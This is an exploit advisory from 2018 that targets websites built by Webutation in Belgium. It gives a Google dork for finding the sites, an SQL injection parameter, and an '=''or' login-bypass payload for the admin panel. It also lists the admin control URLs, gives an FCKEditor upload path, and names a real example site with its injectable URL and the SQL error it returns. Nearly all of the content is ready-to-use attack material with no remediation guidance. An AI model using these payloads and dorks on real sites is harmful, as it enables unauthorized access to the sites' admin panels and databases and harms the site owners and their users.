#################################################################################################
# Exploit Title : Copyright © 2011 - 2018 Webutation Belgium Multiple Vulnerabilities
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 18/09/2018
# Vendor Homepage : webutation.net ~ webutation.org
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 - [ Authentication Bypass Issues ]
+ CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork :
intext:Copyright © 2011 - 2018 Webutation site:be
© Webutation 2018
# SQL Injection Exploit =>
/activiteit.php?id=[SQL Inj]
# Admin Panel Login Path =>
/admin/login.php
# Admin Login Bypass Exploit :
Username : '=''or'
Password : '=''or'
# Useable Admin Panel Control URL Links =>
/admin/ingelogged.php
/admin/activiteiten.php
/admin/info.php
/admin/medewerkers.php
/admin/leden.php
/admin/gastenboek.php
/admin/verslagen.php
# FCKEditor Filemanager Exploit =>
TARGET/fckeditor/editor/filemanager/connectors/uploadtest.html
TARGET/yourfilenamehere.txt
#################################################################################################
# Example Site => tgeverke.be => [ Proof of Concept for Authentication Bypass ] => archive.is/OQ8GQ
# Example Site for SQL Inj => tgeverke.be/activiteit.php?id=465%27
# SQL Database Error =>
FOUT1: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''465''' at line 1
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################